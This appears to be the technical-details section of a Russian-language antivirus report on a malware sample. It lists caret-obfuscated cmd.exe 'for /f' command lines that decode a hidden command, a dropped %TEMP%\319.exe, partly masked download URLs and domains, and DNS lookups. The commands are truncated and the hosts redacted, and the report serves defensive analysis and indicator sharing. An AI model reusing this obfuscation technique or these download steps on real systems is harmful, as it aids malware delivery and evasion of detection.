Техническая информация
- '<SYSTEM32>\cmd.exe' /c fo^r ; /f , ; " tokens= 2 delims=fC=GF" , %^8 , ; in , ( ; ' , aSSO^^c , ; ^^.cm^^d ' , ) , ; ^D^O , , %^8; , MX1v^/^vil^ ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C...
- %TEMP%\319.exe
- %TEMP%\319.exe
- 'ai###-evy.cn':80
- 'ap###iajar.com':80
- 'cr####ostello.com':80
- http://ai###-evy.cn/n0Gjjic9U/
- http://cr####ostello.com/3Ej3t6BK/
- DNS ASK 42##ays.com
- DNS ASK ai###-evy.cn
- DNS ASK ap###iajar.com
- DNS ASK cr####ostello.com
- DNS ASK am#####santorfeto.com
- '<SYSTEM32>\cmd.exe' /c fo^r ; /f , ; " tokens= 2 delims=fC=GF" , %^8 , ; in , ( ; ' , aSSO^^c , ; ^^.cm^^d ' , ) , ; ^D^O , , %^8; , MX1v^/^vil^ ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c aSSO^c ^.cm^d
- '<SYSTEM32>\cmd.exe' ; , MX1v/vil ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C^s^m,3/^)a2 ^pW^wef^Xldq=n;tN\^gP^:.{bR^QkB^j-hr'9o^@^(EH0U^xOy^+^S}KcM) , )& , ; fo^r ; %D ; ^IN ; ( ^2^2 53 ^2...